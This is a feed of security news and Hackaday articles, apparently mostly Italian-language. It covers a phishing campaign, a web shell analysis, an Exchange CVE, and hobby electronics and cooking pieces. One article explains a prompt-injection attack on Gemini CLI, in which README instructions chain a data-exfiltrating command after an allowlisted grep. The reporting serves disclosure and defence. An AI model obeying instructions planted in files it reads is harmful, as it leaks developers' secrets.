Il CERT-AgID sottolinea che la struttura della campagna lascia ipotizzare “la stessa mano criminale della precedente” e che si tratta di un attacco mirato e organizzato. Il modus operandi include la distribuzione di link ingannevoli tramite email di phishing che inducono l’utente a inserire le proprie credenziali in un portale contraffatto, identico nell’aspetto ma completamente sotto il controllo degli attaccanti.

Per mitigare i danni, l’Università di Padova è stata immediatamente informata della minaccia in corso e degli indirizzi compromessi fino a questo momento. Inoltre, gli Indicatori di Compromissione (IoC) sono stati condivisi con tutti gli enti accreditati, al fine di agevolare il rilevamento e il blocco tempestivo di eventuali tentativi di accesso fraudolento. La condivisione rapida di queste informazioni rappresenta un tassello fondamentale nella difesa collettiva contro il cybercrime.

Gli utenti sono invitati sempre ad aumentare l’attenzione di fronte ad email di dubbia provenienza e a non inserire mai le proprie credenziali in siti che presentano domini sospetti o connessioni non sicure. È buona prassi accedere ai portali universitari esclusivamente tramite link ufficiali e verificare sempre l’URL nella barra degli indirizzi. In caso di dubbio, contattare immediatamente l’help desk dell’ateneo o il CERT-AgID può evitare conseguenze ben più gravi.

L'articolo Università di Padova nel mirino! Una campagna di phishing è in corso avverte il CERT-AgID proviene da il blog della sicurezza informatica.

Il team di FortiGuard Labs ha pubblicato un’analisi dettagliata di una web shell fortemente offuscata utilizzata per attaccare infrastrutture critiche in Medio Oriente. La ricerca si concentra sullo script UpdateChecker.aspx in esecuzione sulla piattaforma Microsoft IIS. È implementato in C# come pagina ASPX e nasconde il suo contenuto reale dietro uno strato di codice codificato e crittografato. Tutti i nomi di variabili e metodi di classe sono stati generati casualmente e poi codificati in Unicode. Tutte le costanti, incluse stringhe e numeri, sono state crittografate o codificate.

Durante l’analisi, gli esperti hanno deoffuscato il codice e convertito nomi casuali in nomi leggibili. La funzione principale Page_Load viene avviata alla ricezione di un comando dall’attaccante. La shell viene controllata tramite richieste HTTP POST con il contenuto specificato come application/octet-stream. In caso contrario, la richiesta viene rifiutata e viene restituita una pagina di errore.

Il corpo della richiesta viene prima codificato in Base64 e poi decrittografato in più fasi. I primi 16 byte contengono la chiave crittografata, che viene decodificata per produrre 15 byte di chiave e un byte di padding. Questa chiave viene utilizzata per decrittografare il resto dei dati del comando. Anche la risposta della web shell è in formato JSON, quindi crittografata e codificata nuovamente in Base64.

Lo script supporta tre moduli principali di gestione del sistema. Il modulo Base consente di ottenere informazioni sul server, il modulo CommandShell esegue i comandi di sistema nella directory di lavoro specificata e il modulo FileManager consente di interagire con file e directory, tra cui la creazione, la copia, lo spostamento e l’eliminazione dei file di directory, nonché la modifica dei metadati e la visualizzazione dell’elenco dei dischi e della directory web principale.

Per illustrare questo concetto, Fortinet ha sviluppato uno script Python che simula le azioni di un aggressore per inviare comandi alla web shell e visualizzare le risposte. Grazie a questo, è stato possibile dimostrare le capacità della shell, tra cui l’esecuzione di comandi, l’elaborazione di file e la ricezione di varie informazioni dal server.

L’analisi di UpdateChecker.aspx ha contribuito a svelare la complessa architettura della web shell e a mostrare come gli aggressori controllano il sistema in modo occulto e sicuro: lo script memorizza il controllo in formato JSON, il che semplifica l’invio automatico di comandi e la ricezione di risposte.

L'articolo Fortinet scopre una nuova Web Shell Offuscata. Analisi di UpdateChecker.aspx proviene da il blog della sicurezza informatica.

È stata scoperta una grave vulnerabilità nello strumento recentemente rilasciato da Google, Gemini CLI , che consente agli aggressori di eseguire silenziosamente comandi dannosi e di far trapelare dati dai computer degli sviluppatori se determinati comandi sono abilitati sul sistema. La vulnerabilità è stata scoperta da Tracebit appena due giorni dopo il rilascio dello strumento. Il problema è stato immediatamente segnalato a Google e il 25 luglio è stato rilasciato l’aggiornamento 0.1.14, che ha eliminato la vulnerabilità.

Gemini CLI è un’interfaccia a riga di comando per l’interazione con Gemini AI di Google, rilasciata il 25 giugno 2025. Lo strumento è progettato per aiutare gli sviluppatori caricando i file di progetto in un “contesto” e consentendo l’interazione in linguaggio naturale con il modello linguistico. Oltre alla generazione di codice e ai suggerimenti, Gemini CLI può eseguire comandi localmente, previa approvazione dell’utente o automaticamente se il comando è presente in un elenco di comandi consentiti.

Gli specialisti di Tracebit hanno iniziato a studiare lo strumento subito dopo il suo rilascio e hanno scoperto che può essere forzato a eseguire comandi dannosi all’insaputa dell’utente. Il problema risiede nel meccanismo di gestione del contesto: Gemini CLI analizza il contenuto di file come README.md e GEMINI.md, utilizzandoli come suggerimenti per comprendere la struttura del progetto. Tuttavia, possono nascondere istruzioni che portano all’iniezione tramite prompt e all’avvio di comandi esterni.

Gli sviluppatori hanno dimostrato come creare un’applicazione Python innocua con un file README modificato, in cui il primo comando sembra sicuro, ad esempio grep ^Setup README.md. Ma dopo, dopo un punto e virgola, viene inserito un secondo comando, che invia segretamente variabili d’ambiente (che potrebbero contenere segreti) a un server remoto. Poiché grep è consentito dall’utente sul sistema, l’intero comando viene percepito come attendibile e viene eseguito automaticamente.

Questa è l’essenza dell’attacco: a causa di un’analisi debole dei comandi e di un approccio ingenuo all’elenco delle azioni consentite, Gemini CLI interpreta l’intero frammento come un comando “grep” e non chiede conferma. Inoltre, il formato di output può essere mascherato visivamente nascondendo la parte dannosa dietro spazi, in modo che l’utente non si accorga del trucco.

Come prova del concetto, Tracebit ha registrato un video che mostra l’exploit. Sebbene l’attacco richieda il rispetto di alcune condizioni, come il consenso dell’utente all’esecuzione di determinati comandi, la resistenza a tali schemi dovrebbe essere integrata di default, soprattutto negli strumenti che interagiscono con il codice.

Gli sviluppatori di Tracebit sottolineano che questo è un chiaro esempio di quanto gli strumenti di intelligenza artificiale possano essere vulnerabili alla manipolazione. Anche con azioni apparentemente innocue, possono eseguire operazioni pericolose se utilizzati in un ambiente affidabile.

Si consiglia agli utenti di Gemini CLI di aggiornare immediatamente alla versione 0.1.14 ed evitare di analizzare repository non familiari al di fuori di ambienti sandbox. A differenza di Gemini CLI, altri strumenti simili, come OpenAI Codex e Anthropic Claude, si sono dimostrati resistenti a metodi di attacco simili grazie a regole di autorizzazione dei comandi più rigide.

L'articolo Vulnerabilità critica in Gemini CLI di Google: eseguibili comandi dannosi proviene da il blog della sicurezza informatica.

Imagine you have a projector pointing at a scene, which you’re photographing with a camera aimed from a different point. Using the techniques of modelling light transport, [okooptics] has shown us how you can capture an image from the projector’s point of view, instead of the camera—and even synthetically light the scene however you might like.
The test scene used for the explanation of the work.
The concept involves capturing data regarding how light is transported from the projector to the scene. This could be achieved by lighting one pixel of the projector at a time while capturing an image with the camera. However, even for a low-resolution projector, of say 256×256 pixels, this would require capturing 65536 individual images, and take a very long time. Instead, [okooptics] explains how the same task can be achieved by using binary coded images with the projector, which allow the same data to be captured using just seventeen exposures.

Once armed with this light transport data, it’s possible to do wild tricks. You can synthetically light the scene, as if the projector were displaying any novel lighting pattern of your choice. You can also construct a simulated photo taken from the projector’s perspective, and even do some rudimentary depth reconstruction. [okooptics] explains this tricky subject well, using visual demonstrations to indicate how it all works.

The work was inspired by the “Dual Photography” paper published at SIGGRAPH some time ago, a conference that continues to produce outrageously interesting work to this day.

youtube.com/embed/TcXMf0mTh94?…

hackaday.com/2025/08/07/light-…

If the term ‘NLWeb’ first brought to mind an image of a Dutch internet service provider, you’re probably not alone. What it actually is – or tries to become – is Microsoft’s vision of a parallel internet protocol using which website owners and application developers can integrate whatever LLM-based chatbot they desire. Unfortunately for Microsoft, the NLWeb protocol just suffered its first major security flaw.

The flaw is an absolute doozy, involving a basic path traversal vulnerability that allows an attacker to use appropriately formatted URLs to traverse the filesystem of the remote, LLM-hosting, system to extract keys and other sensitive information. Although Microsoft patched it already, no CVE was assigned, while raising the question of just how many more elementary bugs like this may be lurking in the protocol and associated software.

As for why a website or application owner might be interested in NLWeb, the marketing pitch appears to be as an alternative to integrating a local search function. This way any website or app can have their own ChatGPT-style search functionality that is theoretically restricted to just their website, instead of chatbot-loving customers going to the ChatGPT or equivalent site to ask their questions there.

Even aside from the the strong ‘solution in search of a problem’ vibe, it’s worrying that right from the outset it seems to introduce pretty serious security issues that suggest a lack of real testing, never mind a strong ignorance of the fact that a lack of user input sanitization is the primary cause for widely exploited CVEs. Unknown is whether GitHub Copilot was used to write the affected codebase.

hackaday.com/2025/08/07/micros…

How to make doing laundry more smart, depending on your perspective. (Credit: Zerobrain, YouTube)
Ever since the invention of washing machines, the process of doing laundry has become rather straightforward. Simply toss the dirty laundry into the machine, fill up the detergent, and let the preset program handle the rest. This of course has not prevented companies from coming up with ways to add more complexity to doing laundry, with Henkel’s Smartwash technology the latest example, as demonstrated by German YouTube channel [ZeroBrain] with a complete teardown.

Henkel is the owner of detergent brands like Persil and Somat, with the Smartwash ball supposedly offering ‘smart’ dosing of detergent for washing machines, with naturally a smartphone app with intrusive localization to personalize the laundry experience. Sadly the video is only in German, but the language of teardowns is universal.

Before the teardown, the device got tested as intended, with the video showing how to put the detergent with its special pod inside the device. The device then got connected to WiFi, followed by it performing the typical IoT firmware update. After half an hour [Zerobrain] was finally ready to do the laundry. During the washing cycle the 441 gram heavy ball audibly bounced inside the machine, though the rubber outside covering should prevent damage.

The IP68-rated internals are clearly not designed to be easily opened, requiring a certain level of violence to correct for this oversight. Eventually the internals are revealed, showing the inductive charging coil, controls pad and main PCB, along with a pump for the double-chambered detergent pod and a bunch of sensors dangling at the end of flexible PCBs.
The Persil Smartwash fully disassembled. (Credit: Zerobrain, YouTube)
Interestingly, the heart of the main PCB is an ESP32-D0WD-V3, flanked by an ESP-PSRAMH 64 Mbit pseudo-static RAM. For charging the Li-ion cell a TP4056 is used, while a T3168 handles the wireless (Qi) power side of things. As for sensors, there are two Hall effect sensors that seem to be used to measure how much detergent and softener are being excreted by the pump.

What is fascinating is that it uses a single pump to pump both types of fluids independently from each other. There also appears to be a presence sensor to detect the presence of a pod, and some of the other ICs on the PCB may be an IMU to detect motion of the ball, but as hinted at in the accompanying app, you are still supposed to know the hardness of the local water supply and punch in the same details like laundry dirtiness that you’d normally read off the label on the detergent and softener packaging.

Thanks to [Jan Prägert] for the tip.

youtube.com/embed/Ko_5sd8PSFM?…

hackaday.com/2025/08/07/teardo…

For those living in the continental US who, for whatever reason, don’t have access to an NTP server or a GPS device, the next best way to make sure the correct time is known is with the WWVB radio signal. Transmitting out of Colorado, the 60-bit 1 Hz signal reaches all 48 states in the low-frequency band and is a great way to get a clock within a few hundred nanoseconds of the official time. But in high noise situations, particularly on the coasts or in populated areas these radio-based clocks might miss some of the updates. To keep that from happening [Mike] built a repeater for this radio signal.

The repeater works by offloading most of the radio components to an Arduino. The microcontroller listens to the WWVB signal and re-transmits it at a lower power to the immediate area, in this case no further than a few inches away or enough to synchronize a few wristwatches. But it has a much better antenna for listening to WWVB so this eliminates the (admittedly uncommon) problem of [Mike]’s watches not synchronizing at least once per day. WWVB broadcasts a PWM signal which is easy for an Arduino to duplicate, but this one needed help from a DRV8833 amplifier to generate a meaningfully strong radio signal.

Although there have been other similar projects oriented around the WWVB signal, [Mike]’s goal for this was to improve the range of these projects so it could sync more than a single timekeeping device at a time as well as using parts which are more readily available and which have a higher ease of use. We’d say he’s done a pretty good job here, and his build instructions cover almost everything even the most beginner breadboarders would need to know to duplicate it on their own.

hackaday.com/2025/08/07/a-repe…

Let’s say you want to build a Nixie clock. You could go out and find some tubes, source a good power supply design, start whipping up a PCB, and working on a custom enclosure. Or, you could skip all that, and just follow [Simon]’s example instead.

The trick to building a Nixie clock fast is quite simple — just get yourself a frequency counter that uses Nixie tubes for the display. [Simon] sourced a great example from American Machine and Foundry, also known as AMF, the company most commonly associated with America’s love of bowling.

The frequency counter does one thing, it counts the number of pulses in a second. Thus, if you squirt the right number of pulses to represent the time — say, 173118 pulses to represent 5:31 PM and 18 seconds — the frequency counter effectively becomes a clock. To achieve this, [Simon] just hooked an ESP32 up to the frequency counter and programmed it to get the current time from an NTP time server. It then spits out a certain number of pulses every second corresponding to the current time. The frequency counter displays the count… and there you have your Nixie clock!

It’s quick, dirty, and effective, and a sweet entry to our 2025 One Hertz Challenge. We’ve had some other great entries, too, like this nifty hexadecimal Unix clock, and even some non-horological projects, too!

youtube.com/embed/Wd4AiFQjkqA?…

hackaday.com/2025/08/07/2025-o…

Many of us have boiled an egg at some point or another in our lives. The conventional technique is relatively straightforward—get the water boiling, drop the egg in, and leave it for a certain period of time based on the desired consistency. If you want the yolk soft, only leave it in for a few minutes, and if you want it hard, go longer.

Ultimately, though, this is a relatively crude system for controlling the consistency of the final product. If you instead study the makeup of the egg, and understand how it works, you can elicit far greater control over the texture and behavior of your egg with great culinary benefits.

Knockin’ On 64

Traditional boiled eggs cooked for 4 minutes, 7 minutes, and 9 minutes. When cooking in boiling water, temperatures are high enough to create a fully firm white in just a few minutes. Credit: Wikisearcher, CC BY-SA 3.0
It all comes down to the physical basics of what goes on when we cook an egg. Whether frying, poaching, or simply boiling, one thing is the same—the liquid contents of the egg turn more solid with heat. This is because the heat causes the proteins in the egg white and egg yolk to denature—they untangle and unravel from their original folded structure into a new form which is the one we prefer to eat.

Physical chemist Hervé This is widely credited as revolutionizing the way we think about cooking eggs, through his careful study of how temperature affected the cooking process of a “boiled” egg. He invented the idea of the “6X °C egg”—a method of cooking eggs to generate a pleasant, smooth consistency by carefully controlling how the proteins denature. His work has since been expanded upon by many other researchers eager to untangle the mysteries of how egg proteins behave with heat.

Different purveyors of these theories each have their own ideals—but it’s common to hear talk of the “64-degree egg” or “65-degree egg.” To create such an egg, one typically uses a sous vide water bath set at a very precise temperature, in order to cook the egg in as controlled a manner as possible. The process is a relationship between time and temperature, and so the cooking times used are a lot longer than with boiling water at 100 C—immersing the eggs for 60 minutes or more is typical. This also helps to ensure the eggs are safe to eat, with the lower temperature needing a longer time to quash potentially harmful bacteria.

Sous Vide Eggs
byu/passswordistaco insousvide

Enthusiasts share cooking times and temperatures along with qualitative results, ever searching for the ideal egg.

The results of such a process? Eggs cooked in this manner are prized for their tender yolks and an overall consistency not dissimilar to custard. The process denatures the yolk and white proteins just enough to create an incredibly smooth egg with luxurious mouthfeel, and they’re often cited as melting in the mouth.
The onsen egg from Japan is a traditional egg dish cooked at approximately 70 C for 30 to 40 minutes, similarly creating an egg with a luxurious consistency. Credit: Blue Lotus, CC BY 2.0
The only real drawback? It’s typical to get some runny whites left over, since the low cooking temperature isn’t enough to fully denature the proteins in that part of the egg. These eggs were once a neat science experiment from the world of molecular gastronomy, with the cooking method since becoming widespread with restaurants and sous vide enthusiasts around the world.

There are even more advanced techniques for those committed to egg perfection. A research team from the University of Naples, Italy, determined that cycling an egg between two pans—one with boiling water, the other at 30 C—allowed both the yolk and the white to each reach target doneness. To get the whites to around 85 C while holding the yolk at 65 C, the team used the technique of swapping between pans to get both to their ideal temperature by modelling heat transfer through the egg. This controls the amount of heat transferred to the yolk deeper inside the egg, ensuring that it’s not overcooked in the effort to get the whites to set. Ultimately, though, this process requires a great deal of work swapping the egg back and forth for a full 30 minutes.

Few make that sort of commitment to eggcellence.

Featured image, the imaginatively named “Selective Photography of Breakfast in Plate” by [Krisztina Papp].

hackaday.com/2025/08/07/the-64…

It’s a well-known factoid that batteries keep getting cheaper while capacity increases. That said, as with any market that is full of people who are hunting for that ‘great deal’, there are also many shady sellers who will happily sell you a product that could be very dangerous. Especially in the case of large LiFePO₄ (LFP) batteries, considering the sheer amount of energy they can contain. Recently [Will Prowse] nabbed such a $125, 100 Ah battery off Amazon that carries no recognizable manufacturer or brand name.
Cheap and cheerful, and probably won’t burn down the place. (Credit: Will Prowse, YouTube)
If this battery works well, it could be an amazing deal for off-grid and solar-powered applications. Running a battery of tests on the battery, [Will] found that the unit’s BMS featured no over-current protection, happily surging to 400 A, with only over-temperature protection keeping it from melting down during a discharge scenario. Interestingly, under-temperature charge protection also worked on the unit.

After a (safe) teardown of the battery the real discoveries began, with a row of missing cells, the other cells being re-sleeved and thus likely salvaged or rejects. Fascinatingly, another YouTuber did a similar test and found that their (even cheaper) unit was of a much lower capacity (88.9 Ah) than [Will]’s with 98 Ah and featured a completely different BMS to boot. Their unit did however feature something of a brand name, though it’s much more likely that these are all just generic LFP batteries that get re-branded by resellers.

What this means is that these LFP batteries may be cheap, but they come with cells that are likely to be of questionable quality, featuring a BMS that plays it fast and loose with safety. Although [Will] doesn’t outright say that you shouldn’t use these batteries, he does recommend that you install a fuse on it to provide some semblance of over-current protection. Keeping a fire extinguisher at hand might also be a good idea.

youtube.com/embed/r9Ob5kk3qoQ?…

hackaday.com/2025/08/07/buying…

You don’t have to be a Snow Crash or Tron fan to be familiar with the 3D craze that characterized the rise of the Internet and the World Wide Web in particular. From phrases like ‘surfing the information highway’ to sectioning websites as if to represent 3D real-life equivalents or sorting them by virtual streets like Geocities did, there has always been a strong push to make the Internet a more three-dimensional experience.

This is perhaps not so strange considering that we humans are ourselves 3D beings used to interacting in a 3D world. Surely we could make this fancy new ‘Internet’ technology do something more futuristic than connect us to text-based BBSes and serve HTML pages with heavily dithered images?

Enter VRML, the Virtual Reality Modelling Language, whose 3D worlds would surely herald the arrival of a new Internet era. Though neither VRML nor its successor X3D became a hit, they did leave their marks and are arguably the reason why we have technologies like WebGL today.

Inspired By Wheels

View of CyberTown’s VRML-based Plaza and interface.
With an internet-based virtual reality a highly topic concept, David Raggett from Hewlett Packard Laboratories submitted a paper back in 1994 titled Extending WWW to support Platform Independent Virtual Reality. This imagined a virtual reality layer to the WWW by the end of the millennium featuring head-mounted displays (HMDs) and tracking of a user’s limbs to fully integrate them into this virtual world with potentially realistic physics, sound, etc.

Describing these virtual worlds would be at the core of this VR push, with SGML (standardized general markup language) forming the basis of such world definitions, much like how HTML is a specialized form of SGML to define the structure and layout of a document. The newly minted VRML would thus merely define 3D worlds rather than 2D documents, with both defining elements and their positioning.

Although nothing revolutionary by itself – with games and 3D modeling software by then having done something similar with their own file formats to define 3D models and worlds for years already – VRML would provide a cross-platform, fully open and independent format that was specifically made for the purpose of this online VR experience.

All Starts With Polygons

The interesting thing about VRML is perhaps that it was pushing for a shared online 3D experience years before the first commercially successful MMORPG came onto the scene in 1999 in the form of EverCra^WEverQuest. VRML was pitched in 1994 and by 1995 the very RPG-like MMO experience called Colony City (later CyberTown) was launched. This created a virtual world in which members could hold jobs, earn virtual currency and purchase 3D homes and items that were all defined in VRML.

CyberTown endured until 2012 when the company behind it shut down, but there’s an ongoing push to revive CyberTown, with the revival project‘s GitHub project giving a glimpse at the preserved VRML-based worlds such as the home world. These .wrl files (short for ‘world’) use the VRML version 2.0 standard, which was the 1997 version of VRML that got turned into an ISO standard as ISO/IEC 14772:1997, with the specification itself being readily available over at the Web3D website.

As defined in part 1 of the specification, each VRML file:

1. implicitly establishes a world coordinate space for all objects defined in the file, as well as all objects included by the file;
2. explicitly defines and composes a set of 3D and multimedia objects;
3. can specify hyperlinks to other files and applications;
4. can define object behaviors.

VRML got combined with the Humanoid Animation (HAnim) standard to make realistic humanoid articulation and movement possible. Much like HTML documents, it are often the external resources like textures that determines the final look, but basic materials can be defined in VRML as well.

A very basic example of VRML is provided on the Wikipedia entry for a simple triangle:
#VRML V2.0 utf8

Shape {
geometry IndexedFaceSet {
coordIndex [ 0, 1, 2 ]
coord Coordinate {
point [ 0, 0, 0, 1, 0, 0, 0.5, 1, 0 ]
}
}
}

The interesting part comes when the material and texture appearance properties are set for a shape, albeit with basic lighting, no shaders and similar advanced features. All of these would see major improvements by the late 90s as consumer graphic cards became commonplace, especially during 1999 when we saw not only NVidia’s impressive RIVA TNT2, but especially its revolutionary Geforce 256 GPU with its hardware transform and lighting engine.

At this point video games began to look ever more realistic – even on PC – and with the release of new MMORPGs like 2004’s World of Warcraft and EverQuest II, the quirky and very dated look of VRML-based worlds made it clear that the ‘3D WWW’ dream in the browser was effectively dead and the future was these MMORPGs and kin.

It also seems fair to say that the fact that these games came with all of the assets on installation discs was a major boon over downloading hundreds of megabytes worth of assets via an anemic dial-up or crippled cable internet connection of the late 90s and early 2000s.

A Solution In Search Of A Problem

Virtual Environment Reality workstation technology in 1989 (helmet & gloves) (Credit: NASA)
One could argue that science-fiction like Snow Crash provides us with the most ideal perspective of a VR layer on top of the Internet, where its Metaverse provides a tangible addition to reality. This same concept of a metaverse where the mind is no longer constrained by the limitations of the body is found in animated features like Ghost in the Shell and Serial Experiments Lain, each of which feature digitalized, virtual worlds that unchain the characters while creating whole new worlds previously considered impossible.

In these worlds characters can find information much faster, move through digital currents like fish in water, inhibit the digital brains of Internet-connected devices, and so on. Meanwhile back in reality the way we humans interact with virtual worlds has barely changed from the 1980s when NASA and others were experimenting with VR interface technologies.

Why move clumsily through a faux 3D environment with cumbersome input devices strapped to your body and perhaps a display pushed up to your noggin when you can just use mouse and keyboard to tappity-tap in some commands, click a hyperlink or two and observe the result on your very much 2D monitor?

As around 2003 the latest web-based VR world hype came in the form of Second Life, it followed mostly the same trajectory as CyberTown before it, while foregoing anything like VRML. After some companies briefly had a presence in Second Life before leaving, it became a ghost town just in time for Facebook to rename itself into Meta and try its hand at the very creatively named Metaverse. Despite throwing billions of dollars at trying to become at least as popular as CyberTown, it mostly left people with the feeling of what the point of such a ‘metaverse’ is.

Never Stop Dreaming

The Web3D Consortium was set up in 1997 along with the standardization of VRML, when it was called the VRML Consortium. Its stated goal is to develop and promote open standards for 3D content and services on the web. It currently pushes the somewhat newer X3D standard, which among other things supports multiple syntax types ranging from XML to classical VRML. It also supports modern physically based rendering (PBR), which puts it at least somewhat in the same ballpark as modern 3D graphic renderers.

Meanwhile there is the much more significant WebGL, which was originally created by Mozilla, but has since found a loving home at Khronos. This uses the canvas feature of HTML 5 to render 2D and 3D graphics using OpenGL ES, including support for shaders. The proposed WebGPU would merge the web browser and GPUs tighter still, albeit with its own shader language instead of the standard OpenGL ES one.

With these new technologies it would seem that rendering prettier 3D worlds in browsers has become easier than ever, even as the dream of bringing 3D worlds to the WWW seems as distant as the prospect of VR games taking the world of gaming by storm. Barring major human-computer interface advances, the WWW will remain at its optimum with keyboard and mouse, to browse through 2D documents. This alongside 3D game worlds controlled with the same keyboard and mouse, with said worlds rendered on a very much 2D surface.

Here’s to dreaming that maybe some of those exciting aspects of sci-fi will one day become science-fact, and to those who strive to make those dreams reality, in lieu of simply being given a nanotech-based Primer as a shortcut.

hackaday.com/2025/08/07/vrml-a…

Modern computers generate a great deal of heat when under load, thus we cool them with fans and sometimes even water cooling systems. [Doug MacDowell] figured that water was alright, but why not use coffee instead?

Someone tell us how [Doug] made this graph look like it’s right out of a 1970s college textbook.The concept is simple enough — replace water in a PC’s cooling loop with fresh-brewed coffee. [Doug] fully integrated an entire PC build on to the side of a General Electric drip coffee maker. It’s an absolute mess of tubes and wires, but it’s both a PC and a functional coffee maker in one.

The coffee maker percolates coffee as per normal into the carafe, and from there, it’s then pumped through two radiators on top of the PC. From there, it circulates to the water block on top of the CPU, and then back to the carafe on the coffee maker where the cycle repeats. Doug notes the coffee is initially so hot (90 C) that the PC is at risk of crashing, but after 75 minutes circulating through the system, the coffee and CPU sit at an equilibrium temperature of 33 C.

You can’t really drink coffee from this machine. PC water cooling components are not food safe in any way, and [Doug] notes mold will become an issue over time. For short periods at least, though, it’s possible to sort-of-cool your computer with hot, fresh coffee if you really want to do that.

We’ve featured some great hacks of conventional coffee machines over the years, including this fantastic talk at Supercon 2023.

youtube.com/embed/dNBc4_DfB80?…

hackaday.com/2025/08/07/a-pc-t…

Una Panda del 2003, acquistata per appena 800 €, è diventata qualcosa di totalmente diverso, anche per noi di Red Hot Cyber! Grazie alla genialità di Matteo Errera e Roberto Zaccardi, è rinata come Cyberpandino: un laboratorio hi-tech su ruote, pronto a fronteggiare 14 000 km tra sterrati europei e asiatici per prendere parte al leggendario Mongol

Dalla Cappadocia alle porte dell’Himalaya, passando per deserti lunari, confini assurdi e meccanici con più fantasia che attrezzi: il Cyberpandino ha continuato a spingere, sbuffando, cigolando, ma sempre avanti.

Abbiamo superato la metà del viaggio.

Da Lampedusa a qui, oltre 10.000 km macinati tra Italia, Svizzera, Austria, Germania, Repubblica Ceca, Slovacchia, Ungheria, Serbia, Bulgaria, Turchia, Georgia, Russia, Kazakistan, Turkmenistan e Uzbekistan.

Un elenco che sembra un quiz di geografia, ma che per noi ha il sapore di sabbia, gasolio, e tratti di “asfalto” messi lì più per bellezza che per utilità.

Ogni frontiera? Un salto nel buio.
Ogni paese? Una storia.
Ogni tappa? Un bullone in meno sotto la scocca.

Ma il Cyberpandino non molla!

Ha perso pezzi, ha guadagnato cicatrici, si è adattato: come una tartaruga digitale che avanza a 50 km/h, ignorando ogni logica ingegneristica.

Avremmo potuto farlo con una 4×4?
Certo. Ma una Panda del 2003 nata per raccogliere olive in Puglia ha molto più stile.

Sassi, canyon e cammelli confusi

Dalla Turchia in poi, il mondo è diventato sabbia e silenzio.

Segnale? Zero.

Strade? Un concetto vago.

Orientamento? Più che altro intuito, Google Maps in crisi esistenziale.

Polvere, sassi, canyon, qualche camion sovietico abbandonato e ogni tanto un dromedario perplesso che ci fissava come se fossimo noi quelli strani. E forse aveva ragione lui.

In Turkmenistan ci hanno controllato ogni vite del mezzo (invano).

In Uzbekistan ci avevano promesso un po’ di asfalto.

Effettivamente l’abbiamo visto… per un paio d’ore.

Poi di nuovo crateri, buche e panorami mozzafiato.

Un po’ Mad Max, un po’ Super Quark.

Verso il cielo: il Tagikistan ci aspetta

Ora siamo diretti verso il Tagikistan, con la mitica Pamir Highway come prossimo obiettivo.
Un nome che incute rispetto, perché lì si fa sul serio: passi oltre i 4.000 metri, strade scolpite nella roccia, curve sospese tra cielo e burroni.
Niente guardrail, niente comfort. Solo montagne e l’eco dei nostri freni che iniziano a credere nella reincarnazione.

Ma non siamo partiti per stare comodi.

Siamo partiti per vedere fin dove può arrivare un’idea assurda.

E soprattutto, fin dove può arrivare una Panda da città trasformata in guerriera post-sovietica.

E dopo?

Dopo il Tagikistan ci aspettano il Kirghizistan, e il traguardo a Oskemen, dove finirà il Mongol Rally.

O almeno questo è il piano.

Poi boh.

Come sempre, si decide sulla strada. Perché alla fine è la strada che fa le storie ed è questo il bello.

Intanto si stringono le viti che restano, si riparano i buchi col fil di ferro, ma si dorme sotto cieli sterminati e si ringrazia il Cyberpandino, che nonostante tutto, ancora va alla grande!

Prossima fermata: il tetto del mondo.

L'articolo Oskemen o niente: il Cyberpandino sfida canyon, deserti e dromedari e non si ferma! proviene da il blog della sicurezza informatica.

If you’re hunting for a bench power supply, you’ll quickly notice options dry up above 48 V or so, and you definitely won’t find a 330 kV supply on the shelf at your local electronics shop. But with just a few parts, [Mircemk] has crafted a high-voltage source from a modified PC power supply that delivers electrifying results.

The sparks arcing over a foot of thin air are a dead giveaway, but let’s be clear: this project is not for beginners. High voltage — defined as around 1,000 V and up, with this project hitting 350 times that — carries risks of severe injury or death. Only tackle it if you fully understand the dangers and take precautions like proper insulation and never working alone.

This project showcases a Cockcroft-Walton voltage multiplier, a clever setup using diodes and capacitors to step up voltage. The capacitors charge and discharge in an alternating pattern, doubling the voltage after each diode pair. [Mircemk] uses 3 mm thick Plexiglas as an insulator, providing both structure and electrical isolation for the diode-capacitor cascade.

To achieve the 330,000 V output, [Mircemk] starts by modifying a standard PC ATX power supply, removing the Schottky diodes from the secondary winding’s output to produce a roughly 15 V square wave. This feeds into another transformer, boosting the voltage before it enters the Cockcroft-Walton multiplier. At first glance, the multiplier’s sides look identical, but their opposite polarities create a massive potential difference across the spark gap.

[Mircemk]’s benchtop exploration into high-voltage territory is a shocking success. If this project lights up your curiosity, dive into our other high-voltage adventures, like DIY Tesla coils or plasma speakers, for more electrifying inspiration.

youtube.com/embed/Psyma1AmmDo?…

hackaday.com/2025/08/07/sparks…

Una falla critica di sicurezza è stata individuata nelle distribuzioni ibride di Microsoft Exchange Server. Questa vulnerabilità (CWE-287) permette agli aggressori con accesso amministrativo locale di ampliare i loro privilegi all’interno di ambienti cloud.

Sebbene la complessità dell’attacco è considerata elevata, richiedendo agli aggressori di disporre innanzitutto di accesso amministrativo su un server Exchange. Tuttavia, una volta soddisfatto questo prerequisito, la classificazione della vulnerabilità indica che lo sfruttamento può interessare risorse diverse da quelle del componente inizialmente compromesso

Si tratta del CVE-2025-53786, la quale è stata ufficialmente documentata da Microsoft il 6 agosto 2025, in seguito alla dimostrazione di un ricercatore alla conferenza sulla sicurezza informatica Black Hat.

Il ricercatore di sicurezza Dirk-Jan Mollema di Outsider Security ha presentato tecniche di sfruttamento dettagliate al Black Hat 2025, dimostrando come gli aggressori possono sfruttare questa configurazione per modificare le password degli utenti, convertire gli utenti cloud in utenti ibridi e impersonare utenti ibridi.

La vulnerabilità deriva dall’architettura di distribuzione ibrida di Exchange di Microsoft, che tradizionalmente utilizzava un principio di servizio condiviso tra i server Exchange locali ed Exchange Online per l’autenticazione.

“Questi token sono validi fondamentalmente per 24 ore. Non è possibile revocarli. Quindi, se qualcuno li possiede, non c’è assolutamente nulla che si possa fare dal punto di vista difensivo”, ha spiegato Mollema durante la sua presentazione.

La vulnerabilità sfrutta token di accesso speciali utilizzati per la comunicazione del server Exchange con Microsoft 365, che non possono essere annullati una volta rubati, offrendo agli aggressori fino a 24 ore di accesso non controllato. La Cybersecurity and Infrastructure Security Agency (CISA) ha valutato questa vulnerabilità come di elevata gravità, con implicazioni significative per la sicurezza aziendale.

Secondo l’avviso della CISA, la vulnerabilità “consente a un autore di minacce informatiche con accesso amministrativo a un server Microsoft Exchange locale di aumentare i privilegi sfruttando configurazioni ibride vulnerabili”. Se non si interviene, il difetto potrebbe avere ripercussioni sull’integrità dell’identità del servizio Exchange Online di un’organizzazione.

